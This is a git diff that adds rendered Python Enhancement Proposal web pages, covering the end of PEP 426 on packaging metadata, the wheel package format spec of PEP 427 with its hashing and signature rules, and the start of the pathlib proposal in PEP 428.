While it is expected that there may be some edge cases where manual +intervention is needed for clean conversion, the specification has been +designed to allow fully automated conversion of almost all projects on +PyPI.

+

Metadata conversion (especially on the part of the index server) is a +necessary step to allow installation and analysis tools to start +benefiting from the new metadata format, without having to wait for +developers to upgrade to newer build systems.

+
+
+

Appendix B: Mapping dependency declarations to an RPM SPEC file

+

As an example of mapping this PEP to Linux distro packages, assume an +example project without any extras defined is split into 2 RPMs +in a SPEC file: example and example-devel.

+

The unconditional dependencies would be mapped to the Requires dependencies +for the “example” RPM (a mapping from environment markers relevant to Linux +to SPEC file conditions would also allow those to be handled correctly).

+

The build and dev extra dependencies would be mapped to the +BuildRequires dependencies for the “example” RPM. Depending on how the +%check section in the RPM was defined, the test extra may also be +mapped to the BuildRequires declaration for the RPM.

+

All defined dependencies relevant to Linux in the dev, test, build, +and doc extras would become Requires dependencies for the “example-devel” +RPM.

+

A documentation toolchain dependency like Sphinx would either go in the +build extra (for example, if man pages were included in the +built distribution) or in the doc extra (for example, if the +documentation is published solely through Read the Docs or the +project website). This would be enough to allow an automated converter +to map it to an appropriate dependency in the spec file.

+

If the project did define any extras, those could be mapped to additional +virtual RPMs with appropriate BuildRequires and Requires entries based on +the details of the dependency specifications. Alternatively, they could +be mapped to other system package manager features (such as weak dependencies).

+

The metadata extension format should also provide a way for distribution +specific hints to be included in the upstream project metadata without needing +to manually duplicate any of the upstream metadata in a distribution specific +format.

+
+
+

Appendix C: Summary of differences from PEP 345

+
  • Metadata-Version is now 2.0, with semantics specified for handling version changes
  • The increasingly complex ad hoc “Key: Value” format has been replaced by a more structured JSON compatible format that is easily represented as Python dictionaries, strings, and lists
  • Most fields are now optional and filling in dummy data for omitted fields is explicitly disallowed
  • Explicit permission for in-place clarifications without releasing a new version of the specification
  • The PEP now attempts to provide more of an explanation of why the fields exist and how they are intended to be used, rather than being a simple description of the permitted contents
  • Changed the version scheme to be based on PEP 440 rather than PEP 386
  • Added the source label mechanism as described in PEP 440
  • Formally defined dependency declarations, extras, and environment markers in PEP 508
  • Support for different kinds of dependencies through additional reserved extra names
  • Updated obsolescence mechanism
  • A well-defined metadata extension mechanism, and migration of any fields not needed for dependency resolution to standard extensions
  • With all due respect to Charles Schulz and Peanuts, many of the examples have been updated to be more thematically appropriate for Python ;)

The rationale for major changes is given in the following sections.

+
+

Metadata-Version semantics

+

The semantics of major and minor version increments are now specified, and follow the same model as the format version semantics specified for the wheel format in PEP 427: minor version increments must behave reasonably when processed by a tool that only understands earlier metadata versions with the same major version, while major version increments may include changes that are not compatible with existing tools.

+

The major version number of the specification has been incremented accordingly, as PEP 426 metadata obviously cannot be interpreted in accordance with earlier metadata specifications.

+

Whenever the major version number of the specification is incremented, it +is expected that deployment will take some time, as either metadata +consuming tools must be updated before other tools can safely start +producing the new format, or else the sdist and wheel formats, along with +the installation database definition, will need to be updated to support +provision of multiple versions of the metadata in parallel.

+

Existing tools won’t abide by this guideline until they’re updated to +support the new metadata standard, so the new semantics will first take +effect for a hypothetical 2.x -> 3.0 transition. For the 1.x -> 2.x +transition, we will use the approach where tools continue to produce the +existing supplementary files (such as entry_points.txt) in addition +to any equivalents specified using the new features of the standard +metadata format (including the formal extension mechanism).

+
+
+

Switching to a JSON compatible format

+

The old “Key:Value” format was becoming increasingly limiting, with various +complexities like parsers needing to know which fields were permitted to +occur more than once, which fields supported the environment marker +syntax (with an optional ";" to separate the value from the marker) and +eventually even the option to embed arbitrary JSON inside particular +subfields.

+

The old serialisation format also wasn’t amenable to easy conversion to +standard Python data structures for use in any new install hook APIs, or +in future extensions to the runtime importer APIs to allow them to provide +information for inclusion in the installation database.

+

Accordingly, we’ve taken the step of switching to a JSON-compatible metadata +format. This works better for APIs and is much easier for tools to parse and +generate correctly. Changing the name of the metadata file also makes it +easy to distribute 1.x and 2.x metadata in parallel, greatly simplifying +several aspects of the migration to the new metadata format.

+

The specific choice of pydist.json as the preferred file name relates +to the fact that the metadata described in these files applies to the +distribution as a whole, rather than to any particular build. Additional +metadata formats may be defined in the future to hold information that can +only be determined after building a binary distribution for a particular +target environment.

+
+
+

Changing the version scheme

+

See PEP 440 for a detailed rationale for the various changes made to the +versioning scheme.

+
+
+

Source labels

+

The new source label support is intended to make it clearer that the +constraints on public version identifiers are there primarily to aid in +the creation of reliable automated dependency analysis tools. Projects +are free to use whatever versioning scheme they like internally, so long +as they are able to translate it to something the dependency analysis tools +will understand.

+

Source labels also make it straightforward to record specific details of a +version, like a hash or tag name that allows the release to be reconstructed +from the project version control system.

+
+
+

Support for optional dependencies for distributions

+

The new extras system allows distributions to declare optional +behaviour, and to use the dependency fields to indicate when +particular dependencies are needed only to support that behaviour. It is +derived from the equivalent system that is already in widespread use as +part of setuptools and allows that aspect of the legacy setuptools +metadata to be accurately represented in the new metadata format.

+

The additions to the extras syntax relative to setuptools are defined to +make it easier to express the various possible combinations of dependencies, +in particular those associated with build systems (with optional support +for running the test suite) and development systems.

+
+
+

Support for different kinds of semantic dependencies

+

The separation of the five different kinds of dependency through the Extras system allows a project to optionally indicate whether a dependency is needed specifically to develop, build, test, document or use the distribution.

+

The advantage of having these distinctions supported in the upstream Python specific metadata is that even if a project's developers don't care about these distinctions themselves, they may be more amenable to patches from downstream redistributors that separate the fields appropriately. Over time, this should allow much greater control over where and when particular dependencies end up being installed.

+
+
+

Support for metadata extensions

+

The new extension mechanism effectively allows sections of the metadata namespace to be delegated to other projects, while preserving a standard overall metadata format for ease of processing by distribution tools that do not support a particular extension.

+

It also works well in combination with the new build extra +to allow a distribution to depend on tools which do know how to handle +the chosen extension, and the new extras mechanism in general, allowing +support for particular extensions to be provided as optional features.

+

Possible future uses for extensions include declaration of plugins for +other projects and hints for automatic conversion to Linux system +packages.

+

The ability to declare an extension as required is included primarily to +allow the definition of the metadata hooks extension to be deferred until +some time after the initial adoption of the metadata 2.0 specification. If +a release needs a postinstall hook to run in order to complete +the installation successfully, then earlier versions of tools should fall +back to installing from source rather than installing from a wheel file and +then failing to run the expected postinstall hook.

+
+
+
+

Appendix D: Deferred features

+

Several potentially useful features have been deliberately deferred in +order to better prioritise our efforts in migrating to the new metadata +standard. These all reflect information that may be nice to have in the +new metadata, but which can be readily added through metadata extensions or +in metadata 2.1 without breaking any use cases already supported by metadata +2.0.

+

Once the pypi, setuptools, pip, wheel and distlib +projects support creation and consumption of metadata 2.0, then we may +revisit the creation of metadata 2.1 with some or all of these additional +features.

+
+

Standard extensions

+

Some of the information provided by the legacy metadata system has been +moved out to standard extensions defined in PEP 459.

+

This allows publication of the core dependency metadata in a more readily +consumable format to proceed even before the full details of those extensions +have been resolved.

+
+
+

Improved handling of project obsolescence, renames and mergers

+

Earlier drafts of this PEP included new Provides and Obsoleted-By +fields for more robust automated notifications and tracking of project +obsolescence, renames and mergers.

+

This isn’t an essential feature of a dependency management system, and has +been deferred indefinitely as a possible future metadata extension.

+
+
+

MIME type registration

+

At some point after acceptance of the PEP, we may submit the +following MIME type registration request to IANA:

+
  • application/vnd.python.pydist+json

It’s even possible we may be able to just register the vnd.python +namespace under the banner of the PSF rather than having to register +the individual subformats.

+
+
+

String methods in environment markers

+

Supporting at least the “.startswith” and “.endswith” string methods in environment markers would allow some conditions to be written more naturally. For example, "sys.platform.startswith('win')" is a somewhat more intuitive way to mark Windows specific dependencies, since "'win' in sys.platform" is incorrect thanks to cygwin, and the fact that 64-bit Windows still shows up as win32 is more than a little strange.
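A quick demonstration of the problem (plain Python, independent of the marker syntax itself):

# Note that 64-bit Windows also reports sys.platform == "win32".
for platform in ("win32", "cygwin", "darwin", "linux"):
    print(platform, "win" in platform, platform.startswith("win"))
# win32  True  True
# cygwin True  False  <- the substring test wrongly matches cygwin
# darwin True  False  <- ... and even darwin
# linux  False False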

+
+
+
+

Appendix E: Rejected features

+

The following features have been explicitly considered and rejected as +introducing too much additional complexity for too small a gain in +expressiveness.

+
+

Separate lists for conditional and unconditional dependencies

+

Earlier versions of this PEP used separate lists for conditional and +unconditional dependencies. This turned out to be annoying to handle in +automated tools and removing it also made the PEP and metadata schema +substantially shorter, suggesting it was actually harder to explain as well.

+
+
+

Separate lists for semantic dependencies

+

Earlier versions of this PEP used separate fields rather than the extras +system for test, build, documentation, and development dependencies. This +turned out to be annoying to handle in automated tools and removing it also +made the PEP and metadata schema substantially shorter, suggesting it was +actually harder to explain as well.

+
+
+

Introducing friction for overly precise dependency declarations

+

Earlier versions of this PEP attempted to introduce friction into the +inappropriate use of overly strict dependency declarations in published +releases. Discussion on distutils-sig came to the conclusion that wasn’t +a serious enough problem to tackle directly at the interoperability +specification layer, and if it does become a problem in the future, +it would be better tackled at the point where projects are uploaded to +the public Python Package Index.

+
+
+

Disallowing underscores in distribution names

+

Debian doesn’t actually permit underscores in names, but that seems +unduly restrictive for this spec given the common practice of using +valid Python identifiers as Python distribution names. A Debian side +policy of converting underscores to hyphens seems easy enough to +implement (and the requirement to consider hyphens and underscores as +equivalent ensures that doing so won’t introduce any name conflicts).

+
+
+

Allowing the use of Unicode in distribution names

+

This PEP deliberately avoids following Python 3 down the path of arbitrary +Unicode identifiers, as the security implications of doing so are +substantially worse in the software distribution use case (it opens +up far more interesting attack vectors than mere code obfuscation).

+

In addition, the existing tools really only work properly if you restrict +names to ASCII and changing that would require a lot of work for all +the automated tools in the chain.

+

It may be reasonable to revisit this question at some point in the (distant) +future, but setting up a more reliable software distribution system is +challenging enough without adding more general Unicode identifier support +into the mix.

+
+
+

Depending on source labels

+

There is no mechanism to express a dependency on a source label - they +are included in the metadata for internal project reference only. Instead, +dependencies must be expressed in terms of either public versions or else +direct URL references.

+
+
+

Alternative dependencies

+

An earlier draft of this PEP considered allowing lists in place of the +usual strings in dependency specifications to indicate that there are +multiple ways to satisfy a dependency.

+

If at least one of the individual dependencies was already available, then +the entire dependency would be considered satisfied, otherwise the first +entry would be added to the dependency set.

+

Alternative dependency specification example:

+
["Pillow", "PIL"]
+["mysql", "psycopg2 >= 4", "sqlite3"]
+
+
+

However, neither of the given examples is particularly compelling, +since Pillow/PIL style forks aren’t common, and the database driver use +case would arguably be better served by an SQL Alchemy defined “supported +database driver” metadata extension where a project depends on SQL Alchemy, +and then declares in the extension which database drivers are checked for +compatibility by the upstream project.

+
+
+

Compatible release comparisons in environment markers

+

PEP 440 defines a rich syntax for version comparisons that could +potentially be useful with python_version and python_full_version +in environment markers. However, allowing the full syntax would mean +environment markers are no longer a Python subset, while allowing +only some of the comparisons would introduce yet another special case +to handle.

+

Given that environment markers are only used in cases where a higher level +“or” is implied by the metadata structure, it seems easier to require the +use of multiple comparisons against specific Python versions for the rare +cases where this would be useful.
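For example, rather than a compatible-release clause such as python_version ~= '3.3', a dependency entry would enumerate the acceptable versions explicitly. A hypothetical fragment, reusing the dependency structure shown earlier (the "environment" key for markers is assumed here for illustration):

{
  "requires": ["enum34"],
  "environment": "python_version == '2.7' or python_version == '3.3'"
}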

+
+
+

Conditional provides

+

Under the revised metadata design, conditional “provides” based on runtime +features or the environment would go in a separate “may_provide” field. +However, it isn’t clear there’s any use case for doing that, so the idea +is rejected unless someone can present a compelling use case (and even then +the idea won’t be reconsidered until metadata 2.1 at the earliest).

+
+
+
+

References

+

This document specifies version 2.0 of the metadata format. +Version 1.0 is specified in PEP 241. +Version 1.1 is specified in PEP 314. +Version 1.2 is specified in PEP 345.

+

The initial attempt at a standardised version scheme, along with the +justifications for needing such a standard can be found in PEP 386.

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0426.rst

+

Last modified: 2024-10-06 16:27:00 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0427/index.html new file mode 100644 index 00000000000..22e5a6a5dfa --- /dev/null +++ b/pep-0427/index.html @@ -0,0 +1,614 @@ PEP 427 – The Wheel Binary Package Format 1.0 | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 427 – The Wheel Binary Package Format 1.0

+
+
Author:
+
Daniel Holth <dholth at gmail.com>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
20-Sep-2012
+
Post-History:
+
18-Oct-2012, 15-Feb-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Binary distribution format, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP describes a built-package format for Python called “wheel”.

+

A wheel is a ZIP-format archive with a specially formatted file name and +the .whl extension. It contains a single distribution nearly as it +would be installed according to PEP 376 with a particular installation +scheme. Although a specialized installer is recommended, a wheel file +may be installed by simply unpacking into site-packages with the standard +‘unzip’ tool while preserving enough information to spread its contents +out onto their final paths at any later time.

+
+
+

PEP Acceptance

+

This PEP was accepted, and the defined wheel version updated to 1.0, by +Alyssa Coghlan on 16th February, 2013 [1]

+
+
+

Rationale

+

Python needs a package format that is easier to install than sdist. Python's sdist packages are defined by and require the distutils and setuptools build systems, running arbitrary code to build and install, and re-compiling code just so it can be installed into a new virtualenv. This system of conflating build-install is slow, hard to maintain, and hinders innovation in both build systems and installers.

+

Wheel attempts to remedy these problems by providing a simpler +interface between the build system and the installer. The wheel +binary package format frees installers from having to know about the +build system, saves time by amortizing compile time over many +installations, and removes the need to install a build system in the +target environment.

+
+
+

Details

+
+

Installing a wheel ‘distribution-1.0-py32-none-any.whl’

+

Wheel installation notionally consists of two phases (a minimal sketch of the unpack phase follows the list):

+
  • Unpack.
    1. Parse distribution-1.0.dist-info/WHEEL.
    2. Check that installer is compatible with Wheel-Version. Warn if minor version is greater, abort if major version is greater.
    3. If Root-Is-Purelib == ‘true’, unpack archive into purelib (site-packages).
    4. Else unpack archive into platlib (site-packages).
  • Spread.
    1. Unpacked archive includes distribution-1.0.dist-info/ and (if there is data) distribution-1.0.data/.
    2. Move each subtree of distribution-1.0.data/ onto its destination path. Each subdirectory of distribution-1.0.data/ is a key into a dict of destination directories, such as distribution-1.0.data/(purelib|platlib|headers|scripts|data). The initially supported paths are taken from distutils.command.install.
    3. If applicable, update scripts starting with #!python to point to the correct interpreter.
    4. Update distribution-1.0.dist-info/RECORD with the installed paths.
    5. Remove empty distribution-1.0.data directory.
    6. Compile any installed .py to .pyc. (Uninstallers should be smart enough to remove .pyc even if it is not mentioned in RECORD.)
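As a toy illustration of the unpack phase only, a pure-Python wheel (Root-Is-Purelib: true) can notionally be extracted straight into purelib. This sketch deliberately skips the Wheel-Version check, the spread phase, and RECORD verification, so it is not a conforming installer:

import sysconfig
import zipfile

def unpack_pure_wheel(path):
    # Everything in the archive root lands in purelib for a
    # Root-Is-Purelib wheel; .dist-info/ rides along unchanged.
    with zipfile.ZipFile(path) as archive:
        archive.extractall(sysconfig.get_paths()["purelib"])

unpack_pure_wheel("distribution-1.0-py32-none-any.whl")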
+
+

File Format

+
+

File name convention

+

The wheel filename is {distribution}-{version}(-{build +tag})?-{python tag}-{abi tag}-{platform tag}.whl.

+
+
distribution
Distribution name, e.g. ‘django’, ‘pyramid’.
+
version
Distribution version, e.g. 1.0.
+
build tag
Optional build number. Must start with a digit. Acts as a +tie-breaker if two wheel file names are the same in all other +respects (i.e. name, version, and other tags). Sort as an +empty tuple if unspecified, else sort as a two-item tuple with +the first item being the initial digits as an int, and the +second item being the remainder of the tag as a str.
+
language implementation and version tag
E.g. ‘py27’, ‘py2’, ‘py3’.
+
abi tag
E.g. ‘cp33m’, ‘abi3’, ‘none’.
+
platform tag
E.g. ‘linux_x86_64’, ‘any’.
+
+

For example, distribution-1.0-1-py27-none-any.whl is the first +build of a package called ‘distribution’, and is compatible with +Python 2.7 (any Python 2.7 implementation), with no ABI (pure Python), +on any CPU architecture.

+

The last three components of the filename before the extension are +called “compatibility tags.” The compatibility tags express the +package’s basic interpreter requirements and are detailed in PEP 425.
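A rough helper for splitting such a filename into its components, together with the build-tag sort key described above (hypothetical code, assuming the components have already been escaped so they contain no stray dashes):

import re

def parse_wheel_filename(filename):
    parts = filename[:-len(".whl")].split("-")
    if len(parts) == 6:
        name, version, build, python, abi, platform = parts
    else:
        name, version, python, abi, platform = parts
        build = ""
    return name, version, build, python, abi, platform

def build_tag_sort_key(build):
    # Empty tuple if unspecified, else (initial digits as int, rest as str).
    if not build:
        return ()
    digits = re.match(r"\d+", build).group()
    return (int(digits), build[len(digits):])

print(parse_wheel_filename("distribution-1.0-1-py27-none-any.whl"))
# ('distribution', '1.0', '1', 'py27', 'none', 'any')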

+
+
+

Escaping and Unicode

+

Each component of the filename is escaped by replacing runs of +non-alphanumeric characters with an underscore _:

+
re.sub(r"[^\w\d.]+", "_", distribution, flags=re.UNICODE)
+
+
+

The archive filename is Unicode. It will be some time before the tools +are updated to support non-ASCII filenames, but they are supported in +this specification.

+

The filenames inside the archive are encoded as UTF-8. Although some +ZIP clients in common use do not properly display UTF-8 filenames, +the encoding is supported by both the ZIP specification and Python’s +zipfile.

+
+
+

File contents

+

The contents of a wheel file, where {distribution} is replaced with the +name of the package, e.g. beaglevote and {version} is replaced with +its version, e.g. 1.0.0, consist of:

+
  1. /, the root of the archive, contains all files to be installed in purelib or platlib as specified in WHEEL. purelib and platlib are usually both site-packages.
  2. {distribution}-{version}.dist-info/ contains metadata.
  3. {distribution}-{version}.data/ contains one subdirectory for each non-empty install scheme key not already covered, where the subdirectory name is an index into a dictionary of install paths (e.g. data, scripts, headers, purelib, platlib).
  4. Python scripts must appear in scripts and begin with exactly b'#!python' in order to enjoy script wrapper generation and #!python rewriting at install time. They may have any or no extension.
  5. {distribution}-{version}.dist-info/METADATA is Metadata version 1.1 or greater format metadata.
  6. {distribution}-{version}.dist-info/WHEEL is metadata about the archive itself in the same basic key: value format:
     Wheel-Version: 1.0
     Generator: bdist_wheel 1.0
     Root-Is-Purelib: true
     Tag: py2-none-any
     Tag: py3-none-any
     Build: 1
  7. Wheel-Version is the version number of the Wheel specification.
  8. Generator is the name and optionally the version of the software that produced the archive.
  9. Root-Is-Purelib is true if the top level directory of the archive should be installed into purelib; otherwise the root should be installed into platlib.
  10. Tag is the wheel’s expanded compatibility tags; in the example the filename would contain py2.py3-none-any.
  11. Build is the build number and is omitted if there is no build number.
  12. A wheel installer should warn if Wheel-Version is greater than the version it supports, and must fail if Wheel-Version has a greater major version than the version it supports.
  13. Wheel, being an installation format that is intended to work across multiple versions of Python, does not generally include .pyc files.
  14. Wheel does not contain setup.py or setup.cfg.

This version of the wheel specification is based on the distutils install +schemes and does not define how to install files to other locations. +The layout offers a superset of the functionality provided by the existing +wininst and egg binary formats.

+
+
The .dist-info directory
+
  1. Wheel .dist-info directories include at a minimum METADATA, WHEEL, and RECORD.
  2. METADATA is the package metadata, the same format as PKG-INFO as found at the root of sdists.
  3. WHEEL is the wheel metadata specific to a build of the package.
  4. RECORD is a list of (almost) all the files in the wheel and their secure hashes. Unlike PEP 376, every file except RECORD, which cannot contain a hash of itself, must include its hash. The hash algorithm must be sha256 or better; specifically, md5 and sha1 are not permitted, as signed wheel files rely on the strong hashes in RECORD to validate the integrity of the archive.
  5. PEP 376’s INSTALLER and REQUESTED are not included in the archive.
  6. RECORD.jws is used for digital signatures. It is not mentioned in RECORD.
  7. RECORD.p7s is allowed as a courtesy to anyone who would prefer to use S/MIME signatures to secure their wheel files. It is not mentioned in RECORD.
  8. During extraction, wheel installers verify all the hashes in RECORD against the file contents. Apart from RECORD and its signatures, installation will fail if any file in the archive is not both mentioned and correctly hashed in RECORD.
+
+
The .data directory
+

Any file that is not normally installed inside site-packages goes into +the .data directory, named as the .dist-info directory but with the +.data/ extension:

+
distribution-1.0.dist-info/
+
+distribution-1.0.data/
+
+
+

The .data directory contains subdirectories with the scripts, headers, +documentation and so forth from the distribution. During installation the +contents of these subdirectories are moved onto their destination paths.

+
+
+
+
+

Signed wheel files

+

Wheel files include an extended RECORD that enables digital +signatures. PEP 376’s RECORD is altered to include a secure hash +digestname=urlsafe_b64encode_nopad(digest) (urlsafe base64 +encoding with no trailing = characters) as the second column instead +of an md5sum. All possible entries are hashed, including any +generated files such as .pyc files, but not RECORD which cannot contain its +own hash. For example:

+
file.py,sha256=AVTFPZpEKzuHr7OvQZmhaU3LvwKz06AJw8mT\_pNh2yI,3144
+distribution-1.0.dist-info/RECORD,,
+
+
+

The signature file(s) RECORD.jws and RECORD.p7s are not mentioned in +RECORD at all since they can only be added after RECORD is generated. +Every other file in the archive must have a correct hash in RECORD +or the installation will fail.
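A sketch of producing one such row, using the urlsafe-base64-nopad encoding from the Appendix (the helper name is invented here):

import base64
import hashlib

def record_row(archive_path, data):
    # path, "sha256=" + urlsafe-b64-nopad digest, size in bytes
    digest = base64.urlsafe_b64encode(
        hashlib.sha256(data).digest()).rstrip(b"=").decode("ascii")
    return "%s,sha256=%s,%d" % (archive_path, digest, len(data))

print(record_row("file.py", b"print('hello')\n"))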

+

If JSON web signatures are used, one or more JSON Web Signature JSON +Serialization (JWS-JS) signatures is stored in a file RECORD.jws adjacent +to RECORD. JWS is used to sign RECORD by including the SHA-256 hash of +RECORD as the signature’s JSON payload:

+
{ "hash": "sha256=ADD-r2urObZHcxBW3Cr-vDCu5RJwT4CaRTHiFmbcIYY" }
+
+
+

(The hash value is the same format used in RECORD.)
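Building that payload is straightforward; verifying the JWS envelope around it is the job of a JWS library and is not sketched here:

import base64
import hashlib
import json

def record_signature_payload(record_bytes):
    # The JSON payload signed by JWS: the SHA-256 hash of RECORD,
    # in the same urlsafe-b64-nopad format used inside RECORD.
    digest = base64.urlsafe_b64encode(
        hashlib.sha256(record_bytes).digest()).rstrip(b"=").decode("ascii")
    return json.dumps({"hash": "sha256=" + digest})

print(record_signature_payload(b"file.py,sha256=...,3144\n"))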

+

If RECORD.p7s is used, it must contain a detached S/MIME format signature +of RECORD.

+

A wheel installer is not required to understand digital signatures but +MUST verify the hashes in RECORD against the extracted file contents. +When the installer checks file hashes against RECORD, a separate signature +checker only needs to establish that RECORD matches the signature.

+

See

+ +
+
+

Comparison to .egg

+
  1. Wheel is an installation format; egg is importable. Wheel archives do not need to include .pyc and are less tied to a specific Python version or implementation. Wheel can install (pure Python) packages built with previous versions of Python so you don’t always have to wait for the packager to catch up.
  2. Wheel uses .dist-info directories; egg uses .egg-info. Wheel is compatible with the new world of Python packaging and the new concepts it brings.
  3. Wheel has a richer file naming convention for today’s multi-implementation world. A single wheel archive can indicate its compatibility with a number of Python language versions and implementations, ABIs, and system architectures. Historically the ABI has been specific to a CPython release; wheel is ready for the stable ABI.
  4. Wheel is lossless. The first wheel implementation bdist_wheel always generates egg-info, and then converts it to a .whl. It is also possible to convert existing eggs and bdist_wininst distributions.
  5. Wheel is versioned. Every wheel file contains the version of the wheel specification and the implementation that packaged it. Hopefully the next migration can simply be to Wheel 2.0.
  6. Wheel is a reference to the other Python.
+
+
+

FAQ

+
+

Wheel defines a .data directory. Should I put all my data there?

+
+
This specification does not have an opinion on how you should organize +your code. The .data directory is just a place for any files that are +not normally installed inside site-packages or on the PYTHONPATH. +In other words, you may continue to use pkgutil.get_data(package, +resource) even though those files will usually not be distributed +in wheel’s .data directory.
+
+
+

Why does wheel include attached signatures?

+
+
Attached signatures are more convenient than detached signatures +because they travel with the archive. Since only the individual files +are signed, the archive can be recompressed without invalidating +the signature or individual files can be verified without having +to download the whole archive.
+
+
+

Why does wheel allow JWS signatures?

+
+
The JOSE specifications of which JWS is a part are designed to be easy +to implement, a feature that is also one of wheel’s primary design +goals. JWS yields a useful, concise pure-Python implementation.
+
+
+

Why does wheel also allow S/MIME signatures?

+
+
S/MIME signatures are allowed for users who need or want to use +existing public key infrastructure with wheel.

Signed packages are only a basic building block in a secure package +update system. Wheel only provides the building block.

+
+
+
+

What’s the deal with “purelib” vs. “platlib”?

+
+
Wheel preserves the “purelib” vs. “platlib” distinction, which is +significant on some platforms. For example, Fedora installs pure +Python packages to ‘/usr/lib/pythonX.Y/site-packages’ and platform +dependent packages to ‘/usr/lib64/pythonX.Y/site-packages’.

A wheel with “Root-Is-Purelib: false” with all its files +in {name}-{version}.data/purelib is equivalent to a wheel with +“Root-Is-Purelib: true” with those same files in the root, and it +is legal to have files in both the “purelib” and “platlib” categories.

+

In practice a wheel should have only one of “purelib” or “platlib” +depending on whether it is pure Python or not and those files should +be at the root with the appropriate setting given for “Root-is-purelib”.

+
+
+
+

Is it possible to import Python code directly from a wheel file?

+
+
Technically, due to the combination of supporting installation via +simple extraction and using an archive format that is compatible with +zipimport, a subset of wheel files do support being placed directly +on sys.path. However, while this behaviour is a natural consequence +of the format design, actually relying on it is generally discouraged.

Firstly, wheel is designed primarily as a distribution format, so +skipping the installation step also means deliberately avoiding any +reliance on features that assume full installation (such as being able +to use standard tools like pip and virtualenv to capture and +manage dependencies in a way that can be properly tracked for auditing +and security update purposes, or integrating fully with the standard +build machinery for C extensions by publishing header files in the +appropriate place).

+

Secondly, while some Python software is written to support running +directly from a zip archive, it is still common for code to be written +assuming it has been fully installed. When that assumption is broken +by trying to run the software from a zip archive, the failures can often +be obscure and hard to diagnose (especially when they occur in third +party libraries). The two most common sources of problems with this +are the fact that importing C extensions from a zip archive is not +supported by CPython (since doing so is not supported directly by the +dynamic loading machinery on any platform) and that when running from +a zip archive the __file__ attribute no longer refers to an +ordinary filesystem path, but to a combination path that includes +both the location of the zip archive on the filesystem and the +relative path to the module inside the archive. Even when software +correctly uses the abstract resource APIs internally, interfacing with +external components may still require the availability of an actual +on-disk file.

+

Like metaclasses, monkeypatching and metapath importers, if you’re not +already sure you need to take advantage of this feature, you almost +certainly don’t need it. If you do decide to use it anyway, be +aware that many projects will require a failure to be reproduced with +a fully installed package before accepting it as a genuine bug.

+
+
+
+
+

References

+ +
+
+

Appendix

+

Example urlsafe-base64-nopad implementation:

+
# urlsafe-base64-nopad for Python 3
+import base64
+
+def urlsafe_b64encode_nopad(data):
+    return base64.urlsafe_b64encode(data).rstrip(b'=')
+
+def urlsafe_b64decode_nopad(data):
+    pad = b'=' * (-len(data) % 4)  # 0-3 '=' chars; avoids a spurious full pad group
+    return base64.urlsafe_b64decode(data + pad)
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0427.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0428/index.html new file mode 100644 index 00000000000..29ac3aca163 --- /dev/null +++ b/pep-0428/index.html @@ -0,0 +1,833 @@ PEP 428 – The pathlib module – object-oriented filesystem paths | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 428 – The pathlib module – object-oriented filesystem paths

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Jul-2012
+
Python-Version:
+
3.4
+
Post-History:
+
05-Oct-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the inclusion of a third-party module, pathlib, in +the standard library. The inclusion is proposed under the provisional +label, as described in PEP 411. Therefore, API changes can be done, +either as part of the PEP process, or after acceptance in the standard +library (and until the provisional label is removed).

+

The aim of this library is to provide a simple hierarchy of classes to +handle filesystem paths and the common operations users do over them.

+
+ +
+

Implementation

+

The implementation of this proposal is tracked in the pep428 branch +of pathlib’s Mercurial repository.

+
+
+

Why an object-oriented API

+

The rationale to represent filesystem paths using dedicated classes is the +same as for other kinds of stateless objects, such as dates, times or IP +addresses. Python has been slowly moving away from strictly replicating +the C language’s APIs to providing better, more helpful abstractions around +all kinds of common functionality. Even if this PEP isn’t accepted, it is +likely that another form of filesystem handling abstraction will be adopted +one day into the standard library.

+

Indeed, many people will prefer handling dates and times using the high-level +objects provided by the datetime module, rather than using numeric +timestamps and the time module API. Moreover, using a dedicated class +allows to enable desirable behaviours by default, for example the case +insensitivity of Windows paths.

+
+
+

Proposal

+
+

Class hierarchy

+

The pathlib module implements a simple hierarchy of classes:

+
                +----------+
+                |          |
+       ---------| PurePath |--------
+       |        |          |       |
+       |        +----------+       |
+       |             |             |
+       |             |             |
+       v             |             v
++---------------+    |    +-----------------+
+|               |    |    |                 |
+| PurePosixPath |    |    | PureWindowsPath |
+|               |    |    |                 |
++---------------+    |    +-----------------+
+       |             v             |
+       |          +------+         |
+       |          |      |         |
+       |   -------| Path |------   |
+       |   |      |      |     |   |
+       |   |      +------+     |   |
+       |   |                   |   |
+       |   |                   |   |
+       v   v                   v   v
+  +-----------+           +-------------+
+  |           |           |             |
+  | PosixPath |           | WindowsPath |
+  |           |           |             |
+  +-----------+           +-------------+
+
+
+

This hierarchy divides path classes along two dimensions:

+
  • a path class can be either pure or concrete: pure classes support only operations that don’t need to do any actual I/O, which are most path manipulation operations; concrete classes support all the operations of pure classes, plus operations that do I/O.
  • a path class is of a given flavour according to the kind of operating system paths it represents. pathlib implements two flavours: Windows paths for the filesystem semantics embodied in Windows systems, POSIX paths for other systems.

Any pure class can be instantiated on any system: for example, you can +manipulate PurePosixPath objects under Windows, PureWindowsPath +objects under Unix, and so on. However, concrete classes can only be +instantiated on a matching system: indeed, it would be error-prone to start +doing I/O with WindowsPath objects under Unix, or vice-versa.

+

Furthermore, there are two base classes which also act as system-dependent +factories: PurePath will instantiate either a PurePosixPath or a +PureWindowsPath depending on the operating system. Similarly, Path +will instantiate either a PosixPath or a WindowsPath.

+

It is expected that, in most uses, using the Path class is adequate, +which is why it has the shortest name of all.

+
+
+

No confusion with builtins

+

In this proposal, the path classes do not derive from a builtin type. This +contrasts with some other Path class proposals which were derived from +str. They also do not pretend to implement the sequence protocol: +if you want a path to act as a sequence, you have to lookup a dedicated +attribute (the parts attribute).

+

